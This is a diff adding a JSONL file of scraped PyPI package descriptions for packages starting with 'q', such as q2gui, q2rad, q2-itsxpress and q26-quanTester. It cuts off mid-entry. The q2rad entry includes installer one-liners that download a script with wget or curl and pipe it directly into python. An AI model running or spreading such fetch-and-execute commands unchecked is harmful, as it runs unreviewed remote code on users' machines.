diff --git "a/train/q_entries_out.jsonl" "b/train/q_entries_out.jsonl" new file mode 100644--- /dev/null +++ "b/train/q_entries_out.jsonl" @@ -0,0 +1,3998 @@ +{"package": "q", "pacakge-description": "No description available on PyPI."} +{"package": "q1pulse", "pacakge-description": "No description available on PyPI."} +{"package": "q1q1-dictionary", "pacakge-description": "No description available on PyPI."} +{"package": "q1simulator", "pacakge-description": "No description available on PyPI."} +{"package": "q1ss", "pacakge-description": "This library contains experimental implementations of quantum one-shot signatures by authors from the QSig Commission and other contributors, with special focus on blockchain technology.ContentsInstallUsageAPILicenseInstallThe library is currently in pre-alpha development, but you can install the latest release fromPyPIas follows:$pipinstall--upgradeq1ssLow-level operations are vectorised usingnumpy, which is a required dependency of this library.Ifnumbais installed, it is automatically used to JIT-compile certain low-level operations for additional performance:$pipinstall--upgradenumbaIfcupyis installed additionally tonumba, GPU acceleration can be used for certain operations:$pipinstall--upgradecupyUsageComing soon.APIFor the full API documentation, seehttps://q1ss.readthedocs.io/LicenseLGPL \u00a9 Hashberg Ltd and 20squares UG."} +{"package": "q2", "pacakge-description": "# q2A reinforcement learning framework and command line tool.## Get it` pip install q2 q2--help`## Use itMake a folder,cdto it, then run` q2 init `to generate a new reinforcement learning project.## DocsDocumentation is available athttps://q2.readthedocs.io/.## DevelopYou\u2019ll need Python >= 3.5 (this is because q2 makes use of type annotations)Clone this repositoryI recommend setting up a virtual env in which to develop:python -m venv envpip install -r requirements.txtTo test out the command line tools from your working copy of q2, run` pip install-e. `then run` q2--help`to test that it worked.## ContributingIf you want to submit a bug fix or minor change, feel free to make a pull request.If you want to discuss bigger improvements, send an email to tdbalcorn at gmail dot com."} +{"package": "q26-alphatrading", "pacakge-description": "Q26_QuanTesterQ26 Backtest System is a financial investment simulation tool dedicated for algorithmic traders developped in Python 3.Main features :Python based : very simple configuration file & strategies design modelHigh personnalisation and very wide way of use of the toolEnvironment free of any development bias :No access to future data during the simulationPre-Backtest data preparation :Missing data filling modelsPossibility to resample data to any timeframeMultiple asset synchronizationHigh realism portfolio :Leverage, margin constraints, other security constraintsHigh precision symbols characteristics : lot size, minimum lot size, open/close/off trading hours, fees ...Fully personnalisable strategies & outputsParallelisable backtest, performance optimisation & MC approachAnd a lot more features ...And a lot of new features soon !To get more informations about the Backtest System and the other products of Q26, you can visit our web site by clickinghere. Get access to the detailled documentationhereGetting the Q26 Backtest SystemDownload the code by cloning the git repository usinggit clone https://github.com/LoannData/Q26_QuanTester.gitor install the latest stable version usingpip install q26-quanTesterHands-onHereyou can find a tutorial which shows how to hands-on the Q26 Backtest system"} +{"package": "q26-quanTester", "pacakge-description": "Q26_BacktestSystemQ26 Backtest System is a financial investment simulation tool dedicated for algorithmic traders developped in Python 3.Main features :Python based : very simple configuration file & strategies design modelHigh personnalisation and very wide way of use of the toolEnvironment free of any development bias :No access to future data during the simulationPre-Backtest data preparation :Missing data filling modelsPossibility to resample data to any timeframeMultiple asset synchronizationHigh realism portfolio :Leverage, margin constraints, other security constraintsHigh precision symbols characteristics : lot size, minimum lot size, open/close/off trading hours, fees ...Fully personnalisable strategies & outputsParallelisable backtest, performance optimisation & MC approachAnd a lot more features ...And a lot of new features soon !To get more informations about the Backtest System and the other products of Q26, you can visit our web site by clickinghere. Get access to the detailled documentationhereGetting the Q26 Backtest SystemDownload the code by cloning the git repository using$ git clone https://github.com/LoannData/Q26_BacktestSystem.gitHands-onHereyou can find a tutorial which shows how to hands-on the Q26 Backtest system"} +{"package": "q26-quanTrader", "pacakge-description": "Q26_QuanTraderQ26 QuanTrader is a financial investment system dedicated to algorithmic trading developers who only whant to focus on the development of their trading strategies and not on all the structural framework around. I recommend to the users to use this project with theQ26 QuanTesterdedicated to trading strategies development. This tool is developed thanks to Python 3.Main featuresPython based : very simple confiduration file & strategies design model.Trading strategies developed withQ26 QuanTesterare immediately compatible with this tool.Multi-brokerage choice : With connexion to IBKR (TWS) and MT4 trading platforms, the user has choice to a very large panel of compatible brokers.Precise trading actions record : Every action of the trading algorithm is stored in a log and can be used for futher studies.A lot more interesting features are coming !To get more informations about the Backtest System and the other products of Q26, you can visit our web site by clickinghere. Get access to the detailled documentation [here][2]Getting the Q26 Trading SystemDownload the code by cloning the git repository usinggit clone https://github.com/LoannData/Q26_QuanTrader.gitor install the latest stable version usingpip install q26-quanTraderHands-on(Soon) you can find a tutorial which shows how to hands-on the Q26 Trading System"} +{"package": "q2-brocc", "pacakge-description": "No description available on PyPI."} +{"package": "q2-clawback", "pacakge-description": "No description available on PyPI."} +{"package": "q2data2docx", "pacakge-description": "http://d2d.penta.by/#Tutorial"} +{"package": "q2db", "pacakge-description": "The light Python DB API wrapper with some ORM functions (MySQL, PostgreSQL, SQLite)Quick start (run demo files)- in docker:gitclonehttps://github.com/AndreiPuchko/q2db&&cdq2db/database.docker\n./up.sh\n./down.sh- on your system:pipinstallq2db\ngitclonehttps://github.com/AndreiPuchko/q2db&&cdq2db# sqlite:python3./demo/demo.py# mysql and postgresql:pipinstallmysql-connector-pythonpsycopg2-binarypushddatabase.docker&&docker-composeup-d&&popdpython3./demo/demo_mysql.py\npython3./demo/demo_postgresql.pypushddatabase.docker&&docker-composedown-v&&popdFeatures:Connectfromq2db.dbimportQ2Dbdatabase_sqlite=Q2Db(\"sqlite3\",database_name=\":memory:\")# or justdatabase_sqlite=Q2Db()database_mysql=Q2Db(\"mysql\",user=\"root\",password=\"q2test\"host=\"0.0.0.0\",port=\"3308\",database_name=\"q2test\",)# or justdatabase_mysql=Q2Db(url=\"mysql://root:q2test@0.0.0.0:3308/q2test\")database_postgresql=Q2Db(\"postgresql\",user=\"q2user\",password=\"q2test\"host=\"0.0.0.0\",port=5432,database_name=\"q2test1\",)Define & migrate database schema (ADD COLUMN only).q2db.schemaimportQ2DbSchemaschema=Q2DbSchema()schema.add(table=\"topic_table\",column=\"uid\",datatype=\"int\",datalen=9,pk=True)schema.add(table=\"topic_table\",column=\"name\",datatype=\"varchar\",datalen=100)schema.add(table=\"message_table\",column=\"uid\",datatype=\"int\",datalen=9,pk=True)schema.add(table=\"message_table\",column=\"message\",datatype=\"varchar\",datalen=100)schema.add(table=\"message_table\",column=\"parent_uid\",to_table=\"topic_table\",to_column=\"uid\",related=\"name\")database.set_schema(schema)INSERT, UPDATE, DELETEdatabase.insert(\"topic_table\",{\"name\":\"topic 0\"})database.insert(\"topic_table\",{\"name\":\"topic 1\"})database.insert(\"topic_table\",{\"name\":\"topic 2\"})database.insert(\"topic_table\",{\"name\":\"topic 3\"})database.insert(\"message_table\",{\"message\":\"Message 0 in 0\",\"parent_uid\":0})database.insert(\"message_table\",{\"message\":\"Message 1 in 0\",\"parent_uid\":0})database.insert(\"message_table\",{\"message\":\"Message 0 in 1\",\"parent_uid\":1})database.insert(\"message_table\",{\"message\":\"Message 1 in 1\",\"parent_uid\":1})# this returns False because there is no value 2 in topic_table.id - schema works!database.insert(\"message_table\",{\"message\":\"Message 1 in 1\",\"parent_uid\":2})database.delete(\"message_table\",{\"uid\":2})database.update(\"message_table\",{\"uid\":0,\"message\":\"updated message\"})Cursorcursor=database.cursor(table_name=\"topic_table\")cursor=database.cursor(table_name=\"topic_table\",where=\" name like '%2%'\",order=\"name desc\")cursor.insert({\"name\":\"insert record via cursor\"})cursor.delete({\"uid\":2})cursor.update({\"uid\":0,\"message\":\"updated message\"})cursor=database.cursor(sql=\"select name from topic_table\")forxincursor.records():print(x)print(cursor.r.name)cursor.record(0)['name']cursor.row_count()cursor.first()cursor.last()cursor.next()cursor.prev()cursor.bof()cursor.eof()"} +{"package": "q2-dbbact", "pacakge-description": "q2-dbbactAQiime2plugin fordbBactFeatures:Differential abundance testing usingCalourrank-mean differential abundance test (withdsFDRcorrection).dbBact term enrichment from differntial abundance results of qiime2 (i.e. songbird/q2-aldex2/ancom/dacomp or the built in rank-mean test).Create a wordcloud of dbBact terms for a given feature table.Generate an interactive heatmap visualization for a feature table. The heatmap provides links to dbBact annotations for each ASV.Generate Venn diagram for a differential abundance result and a given dbBact term.Background dbBact term enrichment analysis for experiments without controls (i.e. what terms are enriched in the bacteria in a given feature table compared to all dbBact experiments of a given type).Examples:Run the q2-dbBact enrichment pipeline for a given feature table:Our input is a feature table and a metadata file with a given column dividing our samples into two groups.q2-dbBact will detect ASVs different between the two groups, and identify dbBact terms enriched in one of the two groups compared to the otherqiime dbbact enrich-pipeline --i-table cfs-merged.qza --m-metadata-file map.cfs.txt --p-field Subject --output-dir cfs-pipelineDraw an interactive heatmapThis creates a zoomable heatmap with a list of dbBact annotation for each bacteria that is clicked. Useful for exploring your sequencing results and getting a feeling for what is going on (contaminations, bacterial sources, groups of samples, etc.)Our input is a feature table and a metadata file with a given column dividing our samples into two groups.qiime dbbact heatmap --i-table cfs-table.qza --i-repseqs cfs-rep-seqs.qza --i-taxonomy cfs-taxonomy.qza --m-metadata-file map.cfs.txt --p-sort-field Subject --o-visualization heatmap-cfsDraw a dbBact terms wordcloud for the set of bacteria in a feature-tableThe wordcloud is created for all the bacteria in the feature table.The output wordcloud words are dbBact terms associated with the bacteria. The word size corresponds to the F-score (recall and precision) of the term. Blue terms are positively associated (i.e. appear in COMMON/DOMINANT/HIGHER IN annotations) where as red terms (preceeded by a \"-\") are negatively associated (i.e. appear in LOWER IN annotations).qiime dbbact draw-wordcloud-vis --i-data cfs-table.qza --i-repseqs cfs-rep-seqs.qza --o-visualization wordcloud-cfsIdentify differentially abundant bacteria between two sample groupsq2-dbBact utilizes the non-parametric (permutation based) Calour diff_abundance() function. By default it uses a rank-mean test with dsFDR multiple hypothesis correction.The test can also be performed as a paired test using an additional metadata pair-field (permutations are performed only between samples sharing the same pair-field value).qiime dbbact diff-abundance --i-table cfs-merged.qza --m-metadata-file map.cfs.txt --p-field Subject --p-alpha 0.1 --p-val1 Patient --p-val2 Control --o-diff diff-cfs-dsfdrIdentify and plot enriched dbBact terms between two groups of bacteriaPerformed on the output of a differential-abundance test. q2-dbBact supports the following formats:songbirdancomq2-aldex2dbBact diff-abundanceany tsv fileThis command identifies dbBact terms the are significantly more associated with bacteria from one group compared to the otherqiime dbbact enrichment --i-diff diff-cfs-dsfdr.qza --p-source dsfdr --o-enriched enriched-cfs-dsfdrThe output can be visualized (and the complete table saved) using the visualization command:qiime dbbact plot-enrichment --i-enriched enriched-cfs-dsfdr.qza --o-visualization barplot-enriched-cfs-dsfdr --p-labels CFS ControlVenn diagram for examining term distribution in the two groupsInput is the results of a differential abundance analysis (which provides two ASV groups - positive and negative effect size), and a dbBact term.The venn diagram shows how many of the ASVs in each group have the term, as well as how many total dbBact ASVs have the term associated.qiime dbbact venn --i-diff diff-cfs-dsfdr.qza --p-terms \"small village\" --p-source dsfdr --p-label1 Control --p-label2 CFS --o-visualization venn-cfs-human-village"} +{"package": "q2-greengenes2", "pacakge-description": "No description available on PyPI."} +{"package": "q2gui", "pacakge-description": "The light Python GUI builder (currently based on PyQt6)How to startWith docker && x11:gitclonehttps://github.com/AndreiPuchko/q2gui.git# sudo if necessarycdq2gui/docker-x11&&./build_and_run_menu.shWith PyPI package:poetrynewproject_01&&cdproject_01&&poetryshell\npoetryaddq2guicdproject_01\npython-mq2gui>example_app.py&&pythonexample_app.pyExplore sources:gitclonehttps://github.com/AndreiPuchko/q2gui.gitcdq2gui\npip3installpoetry\npoetryshell\npoetryinstall\npython3demo/demo_00.py# All demo launcherpython3demo/demo_01.py# basic: main menu, form & widgetspython3demo/demo_02.py# forms and forms in formpython3demo/demo_03.py# grid form (CSV data), automatic creation of forms based on datapython3demo/demo_04.py# progressbar, data loading, sorting and filteringpython3demo/demo_05.py# nonmodal formpython3demo/demo_06.py# code editorpython3demo/demo_07.py# database app (4 tables, mock data loading) - requires a q2db packagepython3demo/demo_08.py# database app, requires a q2db package, autoschemademo/demo_07.py screenshot=======Build standalone executable(The resulting executable file will appear in the folder dist/)One filepyinstaller-Fdemo/demo.pyOne directorypyinstaller-Ddemo/demo.py"} +{"package": "q2-itsxpress", "pacakge-description": "This is the end of life version 1 of q2_itsxpress and the command line version of ITSxpress. See\n1.8.1-EOL branch of ITSxpress. The new version 2 of ITSxpress, has the Qiime2 plugin built in with command line version of ITSxpress.See ITSxpress 1.8.1-EOL branch here:ITSxpress-1.8.1-EOLAuthorsAdam R. Rivers, US Department of Agriculture, Agricultural Research ServiceKyle C. Weber, US Department of Agriculture, Agricultural Research ServiceSveinn V. Einarsson, US Department of Agriculture, Agricultural Research ServiceCitationRivers AR, Weber KC, Gardner TG et al. ITSxpress: Software to rapidly trim\ninternally transcribed spacer sequences with quality scores for marker gene\nanalysis. F1000Research 2018, 7:1418. doi:10.12688/f1000research.15704.1IntroductionThe internally transcribed spacer (ITS) is a region between the small subunit\nand large subunit rRNA genes. In is a commonly used phylogenetic marker for\nFungi and other Eukaryotes. The ITS contains the 5.8s gene and two variable\nlength spacer regions. In amplicon sequencing studies it is common practice to\ntrim off the conserved (SSU, 5,8S or LSU) regions. Bengtsson-Palme et al. (2013)\npublished a software packageITSxto do this.Q2-ITSxpress extends this work by rapidly trimming FASTQ sequences within\nQiime2. Q2-ITSxpress is the Qiime2 plugin version of the stand alone command\nline utilityITSxpress. Q2_ITSxpress is designed to support the calling of\nexact sequence variants rather than OTUs. This newer method of sequence\nerror-correction requires quality score data from each sequence, so each input\nsequence must be trimmed. ITSxpress makes this possible by taking FASTQ data,\nde-replicating the sequences then identifying the start and stop sites using\nHMMSearch. Results are parsed and the trimmed files are returned. The ITS1,\nITS2 or the entire ITS region including the 5.8s rRNA gene can be selected.\nITSxpress uses the hmm models from ITSx so results are nearly identical.Requirements/DependenciesQiime2 is required to run Q2-itsxpress (for stand alone software seeITSxpress)To install Qiime2 follow these instructions:https://docs.qiime2.org/2022.8/install/This end of life version 1 of q2-itsxpress and ITSxpress isONLYcompatible with Qiime2 version 2022.8. So make sure to follow the link above.We are using mamba because it resolves packages better and faster, but conda can be substituted.Information on installing mamba or micromamba (either highly recommended) can be found here:mamba installation guideQ2-itsxpress plugin installationExample on how to install and create new Qiime2-2022.8 environment.wgethttps://data.qiime2.org/distro/core/qiime2-2022.8-py38-osx-conda.ymlmambaenvcreate-nqiime2-2022.8--fileqiime2-2022.8-py38-osx-conda.ymlActivate the Qiime2 conda environmentmambaactivateqiime2-2022.8Install Q2_itsxpress usingBioConda. Be sure to install itsxpress and q2_itsxpress in the Qiime2 environment using the following commands.mambainstall-cbiocondaitsxpress==1.8.1pipinstallq2-itsxpressIn your Qiime2 environment, refresh the plugins.qiimedevrefresh-cacheCheck to see if the ITSxpress plugin is installed. You should see an output similar to the image below.qiimeitsxpressUsageWithin Qiime2 you can trim paired-end or single-end reads using these commandsqiimeitsxpresstrim-pairqiimeitsxpresstrim-pair-output-unmergedqiimeitsxpresstrim-singleqiime itsxpress trim-singleThis command takes single-end data and returns trimmed reads. The sequence may\nhave been merged previously or have been generated from a long read technology\nlike PacBio. Merged and long reads trimmed by this function can be used by\nDeblur but only long reads (not merged reads) trimmed by this function should\nbe passed to Dada2. Its statistical model for estimating error rates was not\ndesigned for pre-merged reads.Command-requirementDescription\u2013i-per-sample-sequencesThe artifact that contains the sequence file(s).Either Joined Paired or just a single fastq.One file sequence in the qza data folder.\u2013p-regionThe regions ITS2, ITS1, and ALL.\u2013p-taxaSelect the taxonomic group sequenced: A, B, C, D, E, F, G, H, I, L, M, O, P,\nQ, R, S, T, U, V, ALL.\u2013p-threadsThe amount of threads to use.\u2013o-trimmedThe resulting trimmed sequences from ITSxpress in a qza format.\u2013cluster-idThe percent identity for clustering reads, set to 1 for exact dereplication.qiime itsxpress trim-pairThis command takes paired-end data and returns merged, trimmed reads. The\nmerged reads trimmed by this function can be used by Deblur but not\nDada2. Its statistical model for estimating error rates was not\ndesigned for pre-merged reads, instead useqiime itsxpress trim-pair-output-unmerged.Command-requirementDescription\u2013i-per-sample-sequencesThe artifact that contains the sequence file(s).Either Joined Paired or just a single fastq.One file sequence in the qza data folder.\u2013p-regionThe regions ITS2, ITS1, and ALL.\u2013p-taxaSelect the taxonomic group sequenced: A, B, C, D, E, F, G, H, I, L, M, O, P,\nQ, R, S, T, U, V, ALL.\u2013p-threadsThe amount of threads to use.\u2013o-trimmedThe resulting trimmed sequences from ITSxpress in a qza format.\u2013cluster-idThe percent identity for clustering reads, set to 1 for exact dereplication.qiime itsxpress trim-pair-output-unmergedThis command takes paired-end data and returns unmerged, trimmed reads. The\nmerged reads trimmed by this function can be used by Dada2 but not Deblur.\nFor Deblur useqiime itsxpress trim-pair.Command-requirementDescription\u2013i-per-sample-sequencesThe artifact that contains the sequence file.Only paired will work.Two file sequences in the qza data folder.\u2013p-regionThe regions ITS2, ITS1, and ALL.\u2013p-taxaSelect the taxonomic group sequenced: A, B, C, D, E, F, G, H, I, L, M, O, P,\nQ, R, S, T, U, V, ALL.\u2013p-threadsThe amount of threads to use.\u2013o-trimmedThe resulting trimmed sequences from ITSxpress in a qza format.\u2013cluster-idThe percent identity for clustering reads, set to 1 for exact dereplication.Taxa KeyAAlveolataBBryophytaCBacillariophytaDAmoebozoaEEuglenozoaFFungiGChlorophyta (green algae)HRhodophyta (red algae)IPhaeophyceae (brown algae)LMarchantiophyta (liverworts)MMetazoaOOomycotaPHaptophyceae (prymnesiophytes)QRaphidophyceaeRRhizariaSSynurophyceaeTTracheophyta (higher plants)UEustigmatophyceaeALLAllExampleUse case: Trimming the ITS2 region from a fungal amplicon\nsequencing dataset with a PairedSequencesWithQuailty qza using two cpu threads.\nThe example file used is in the Tests folder under paired.qza.qiimeitsxpresstrim-pair--i-per-sample-sequences~/parired.qza--p-regionITS2\\--p-taxaF--p-threads2--o-trimmed~/Desktop/out.qzaLicense informationThis software is a work of the United States Department of Agriculture,\nAgricultural Research Service and is released under a Creative Commons CC0\npublic domain attribution."} +{"package": "q2k", "pacakge-description": "No description available on PyPI."} +{"package": "q2-metabodisttrees", "pacakge-description": "No description available on PyPI."} +{"package": "q2-micom", "pacakge-description": "A QIIME 2 plugin for MICOM.InstallationYou will need an existing QIIME 2 environment. Follow the instructions on (how to install QIIME 2) otherwise.q2-micomis compatible with all QIIME 2 distributions.\nLet's assume that environment was calledqiime2-2023.9for all further steps.Add q2-micom to the QIIME 2 environmentThis will be the same step for any supported QIIME 2 version but will vary depending on your operating system\n(similar to the normal QIIME 2 installation).Linuxwgethttps://raw.githubusercontent.com/micom-dev/q2-micom/main/q2-micom-linux.yml\ncondaenvupdate-nqiime2-2023.8-fq2-micom-linux.yml# OPTIONAL CLEANUPrmq2-micom-*.ymlMacwgethttps://raw.githubusercontent.com/micom-dev/q2-micom/main/q2-micom-osx.yml\ncondaenvupdate-nqiime2-2023.9-fq2-micom-osx.yml# OPTIONAL CLEANUPrmq2-micom-*.ymlFinally, you activate your environment.condaactivateqiime2-2023.9q2-micomwill now install an open source solver that can be used with MICOM. If you use MICOM\nregularly we do recommend to obtain an academic license for CPLEX or Gurobi which will be faster.Install a faster solver (recommended but optional)CPLEXQIIME 2 versions before 2021.4 are only compatible with CPLEX 12.10 or earlier (later version require at least Python 3.7).After registering and downloading the CPLEX studio for your OS unpack it (by running the provided installer) to a directory of your choice (we will assume it's calledibm).Now install the CPLEX python package into your activated environment:pipinstallibm/cplex/python/3.8/x86-64_linuxSubstitute3.8with the Python version in your QIIME 2 environment,3.6for QIIME 2 up to 2021.2 and3.8for QIIME 2 2021.4 and newer.\nSubstitutex86-64_linuxwith the folder corresponding to your system (there will only be one subfolder in that directory).GurobiGurobi can be installed with conda.condainstall-cgurobigurobiYou will now have to register the installation using your license key.grbgetkeyYOUR-LICENSE-KEYFinish your installationIf you installedq2-micomin an already existing QIIME 2 environment, update the plugin cache:condaactivateqiime2-2023.9# or whatever you called your environmentqiimedevrefresh-cacheYou are now ready to runq2-micom!UsageHere is a graphical overview of aq2-micomanalysis.The best way to get started is to work through thecommunity tutorial.Supported QIIME 2 versionsq2-micomis tested against:the currentQIIME 2 versionthe previous versionIt should also work withthedevelopment versionHowever, this may occasionally break. Checkhere for the current status.ReferencesMICOM: Metagenome-Scale Modeling To Infer Metabolic Interactions in the Gut MicrobiotaChristian Diener, Sean M. Gibbons, Osbaldo Resendis-AntoniomSystems 5:e00606-19https://doi.org/10.1128/mSystems.00606-19"} +{"package": "q2-mislabeled", "pacakge-description": "q2-mislabeled is a QIIME 2 plugin that facilitates detection of mislabeled and contaminated samples. It does so by using q2-sample-classifier, and SourceTracker2."} +{"package": "q2-omxware", "pacakge-description": "No description available on PyPI."} +{"package": "q2rad", "pacakge-description": "The RAD (rapid application development) system.(code less, make more)Based on:q2db (https://pypi.org/project/q2db)q2gui (https://pypi.org/project/q2gui)q2report (https://pypi.org/project/q2report)Read the docsSystem requirements:Python >= 3.8.1onLinuxand Python >=3.11 make sure you have pip and virtualenv installed, if not:sudoaptinstallpython3-pippython3-virtualenvInstall & run - Launcher (https://github.com/AndreiPuchko/q2radlauncher)Go to the download pagehttps://github.com/AndreiPuchko/q2radlauncher/releases/latestand download file for your OS:Windows: q2radlauncher.exeLinux: q2radlauncher-linux.zipmacOS: q2radlauncher-macos.zipInstall & run - Python scriptWindowswgethttps://raw.githubusercontent.com/AndreiPuchko/q2rad/main/install/get-q2rad.py-Oget-q2rad.py|pyget-q2rad.py;delget-q2rad.pyLinuxwgethttps://raw.githubusercontent.com/AndreiPuchko/q2rad/main/install/get-q2rad.py-O-|python3macOScurlhttps://raw.githubusercontent.com/AndreiPuchko/q2rad/main/install/get-q2rad.py|python3Install & run - terminalWindows (Powershell)mkdirq2rad;`cdq2rad;`py-mpipinstall--upgradepip;`py-mvenvq2rad;q2rad/scripts/activate;`py-mpipinstall--upgradeq2rad;`q2radLinuxsudoaptinstallpython3-venvpython3-pip-y&&\\mkdir-pq2rad&&\\cdq2rad&&\\python3-mpipinstall--upgradepip&&\\python3-mvenvq2rad&&\\sourceq2rad/bin/activate&&\\python3-mpipinstall--upgradeq2rad&&\\q2radmacOSmkdir-pq2rad&&\\cdq2rad&&\\python3-mpipinstall--upgradepip&&\\python3-mvenvq2rad&&\\sourceq2rad/bin/activate&&\\python3-mpipinstall--upgradeq2rad&&\\q2radConcept:Application as a databaseForms:# may have main menu (menubar) definitions# may be linked to database tableLines:# form fields(type of data and type of form control) and# layout definitions# when form is linked to database - database columns definitionsActions:# applies for database linked forms# may be standard CRUD-action# or# run a script (run reports, forms and etc)# or# may have linked subforms (one-to-many)Modules:# python scriptsQueries:# query development and debugging toolReports:# multiformat (HTML, DOCX, XLSX) reporting tool"} +{"package": "q2report", "pacakge-description": "The light Python report builder.Converts data into formatted text (HTML,DOCX,XLSX):data={'data_source1':[{'col1':'value row1',....},...],'data_source2':[{'col_1':'valie_row1',....},...],}Available formatting (styling options):\"style\":{\"font-family\":\"Arial\",\"font-size\":\"10pt\",\"font-weight\":\"normal\",\"border-width\":\"0 0 0 0\",\"padding\":\"0.05cm 0.05cm 0.05cm 0.05cm\",\"text-align\":\"left\",\"vertical-align\":\"top\"}ConceptThe report definition consists of sections (Report, Pages, Columns, Rows, Cells).Each section inherits style from previous and may override some styling options.see examples in foldertest_dataReport:# contains basic stylePages:# page & margins sizesColumns:# columns widths - exact, % or autowidthRows:# rows heights - auto, exact, min or max# can be linked to data and then have header, footer and grouping subsections#Cells# contains simple text and data links - {col1}# and aggregate functions - {sum:coll}# support html formatting with
# cells may be merged (span)Rows:Cells....Columns:....Pages:........"} +{"package": "q2-SCNIC", "pacakge-description": "No description available on PyPI."} +{"package": "q2terminal", "pacakge-description": "Interaction with a terminal sessionfromq2terminal.q2terminalimportQ2Terminalimportsyst=Q2Terminal()t.run(\"programm\",echo=True)assertt.exit_code!=0assertt.run(\"$q2 = 123\")==[]assertt.run(\"echo $q2\")==[\"123\"]if\"win32\"insys.platform:t.run(\"notepad\")assertt.exit_code==0"} +{"package": "q2-umap", "pacakge-description": "No description available on PyPI."} +{"package": "q3", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "q3api", "pacakge-description": "No description available on PyPI."} +{"package": "q3c", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "q3dfit", "pacakge-description": "Model astronomical data from integral field spectrographs."} +{"package": "q3huff", "pacakge-description": "No description available on PyPI."} +{"package": "q3huff2", "pacakge-description": "No description available on PyPI."} +{"package": "q3net", "pacakge-description": "No description available on PyPI."} +{"package": "q3rcon", "pacakge-description": "[![Pypi version](http://img.shields.io/pypi/v/acoomans_python_project_template.svg)](https://pypi.python.org/pypi/acoomans_python_project_template)\n[![Pypi license](http://img.shields.io/pypi/l/acoomans_python_project_template.svg)](https://pypi.python.org/pypi/acoomans_python_project_template)\n![Python 3](http://img.shields.io/badge/python-3-blue.svg)## Installpip install q3rconorpython setup.py install## UsageRun console:q3rcon-cli [hostname]Run web server:q3rcon-web \u2013rcon_host HOST \u2013rcon_password PASSWORDand then access the web server at [http://localhost:9344/](http://localhost:9344/)"} +{"package": "q3sim", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "q4n", "pacakge-description": "No description available on PyPI."} +{"package": "q4nwin", "pacakge-description": "No description available on PyPI."} +{"package": "q5", "pacakge-description": "q5Creative coding framework for PythonInstallationYou can install q5 with:pip install q5UsageExamplesSeeexamples.Project Template# -*- coding: utf-8 -*-importq5classApp(q5.BaseApp):defsetup(self):q5.title('q5 app')defupdate(self):passdefdraw(self):q5.background(220)q5.ellipse(0.0,0.0,200.0,200.0)if__name__=='__main__':app=App()app.run()DevelopmentInstall Rust lang:https://www.rust-lang.org/Run commands:pip install setuptools-rust\npython setup.py developLicenseMIT"} +{"package": "q5-django-inlinecss", "pacakge-description": "AboutInlining CSS is necessary for email generation and sending\nbut is currently a surprisingly large hassle.This library aims to make it a breeze in the Django\ntemplate language.UsageStep 1: DependenciesBeautifulSoupcssutilsPython 2.7+,3.4+Django 1.11+Step 2: Install django_inlinecssAdddjango_inlinecssto yoursettings.py:INSTALLED_APPS=('django.contrib.auth','django.contrib.webdesign','django.contrib.contenttypes','...','...','...','django_inlinecss')Step 3: Use the templatetagPlace your CSS file somewhere staticfiles can find itCreate your template:{% load inlinecss %}\n{% inlinecss \"css/extra-padding.css\" %}Something in need of styling.{% endinlinecss %}Step 4: Prepare to be WowedSomething in need of styling.AcknowledgementsThanks to Tanner Netterville for his efforts onPynliner.Thanks to Thomas Yip for his unit tests on thesoupselectmodule. These tests\nhelped on getting the core CSS2 selectors to work.LicenseMIT license. See LICENSE.md for more detail."} +{"package": "q9", "pacakge-description": "No description available on PyPI."} +{"package": "qa", "pacakge-description": "No description available on PyPI."} +{"package": "qa4sm-preprocessing", "pacakge-description": "This package contains functions to preprocess certain data before using them\nin the QA4SM online validation framework.ISMN FRMThis module contains the routine to assign FRM qualifications ISMN sensors.\nThe Quality Indicators (QIs) are based on a Triple Collocation run with\n80% CI between ISMN (0-10 cm, \u201cgood\u201d time stamps), ERA5-Land (\u201cswvl1\u201d) and\nESA CCI SM v06.1 PASSIVE. See./docs/ismn_frm.rstfor more details.CGLS HR SSM SWIRead CGLS HR SSM and SWI images (1km sampling) in netcdf format and convert\nthem to time series.\nThe image reader allows reading/converting data for a spatial subset (bbox) only.\nTime series are stored in 5*5 DEG cell files, i.e. there are~250 000 time seriesstored in one single cell file.Time series reading is done based on cell level. Up to 6 cells are loaded into\nmemory at a time. Theread_areafunction allows reading multiple GPI time series\naround one location at once (and optionally converting them into a single, averaged\nseries, to represent the mean SM for an area).Necessary updatesAt the moment it is only possible to read a single variable. However, in order\nto mask SM time series based in location quality flags, it is necessary to\nread multiple parameters. When passing the averaged time series for an area\ntopytesmofor validation, masking can not be done inpytesmo, but must be done\nbeforehand.NoteThis project has been set up using PyScaffold 4.0.2. For details and usage\ninformation on PyScaffold seehttps://pyscaffold.org/."} +{"package": "qa4sm-reader", "pacakge-description": "qa4sm_reader is a python package to read and plot the result files of theqa4sm service.InstallationThis package should be installable through pip (not yet tough, see development):pip install qa4sm_readerUsageThis package is used to analyze a qa4sm netCDF output file and produce all relevant plots and maps.Development SetupThe project was setup usingpyscaffoldand closely follows the recommendations.Install DependenciesFor Development we recommend creating acondaenvironment.cd qa4sm-reader\nconda env create # create environment from requirements.rst\nconda activate qa4sm-reader\npython setup.py develop # Links the code to the environmentTo remove the environment again, run:conda deactivate\nconda env remove -n qa4sm_readerCode FormattingTo apply pep8 conform styling to any changed files [we useyapf](https://github.com/google/yapf). The correct\nsettings are already set insetup.cfg. Therefore the following command\nshould be enough:yapf file.py --in-placeTestingFor testing, we usepy.test:pytestThe dependencies are automatically installed bypytest-runnerwhen you run the tests. The test-dependencies are listed in thetestingfield inside the[options.extras_require]section ofsetup.cfg.\nFor some reasons, the dependencies are not installed as expected. To workaround, do:pip install pytest-covThe files used for testing are included in this package. They are however subject to otherterms and conditions.Known IssuesNo known issues - pleaseopen an issuein case you come across a malfunctioning in the package."} +{"package": "qaa", "pacakge-description": "Featuresqaaanalyzes molecular dynamics (MD) trajectories by using joint\ndiagonalization (JADE) to separate the information. The JADE[1]and QAA[2]code are based on the original code written in Matlab.[1]Cardoso, J. F.; Souloumiac, A. \u201cBlind Beamforming for Non-Gaussian\nSignals.\u201d IEE Proc F Radar Signal Process 1993, 140 (6), 362.[2]Ramanathan, A.; Savol, A. J.; Langmead, C. J.; Agarwal, P. K.;\nChennubhotla, C. S. \u201cDiscovering Conformational Sub-States Relevant to Protein\nFunction.\u201d Plos One 2011, 6 (1), e15827.RequirementsPython 3.8+click 7.0+numpy 1.20+scipy 1.6+matplotlib 3.3+scikit-learn 0.24+mdtraj 1.9+nptyping 1.4+holoviews 1.14+InstallationYou can installQuasi-Anharmonic AnalysisviapipfromPyPI:$pipinstallqaaIf you want to 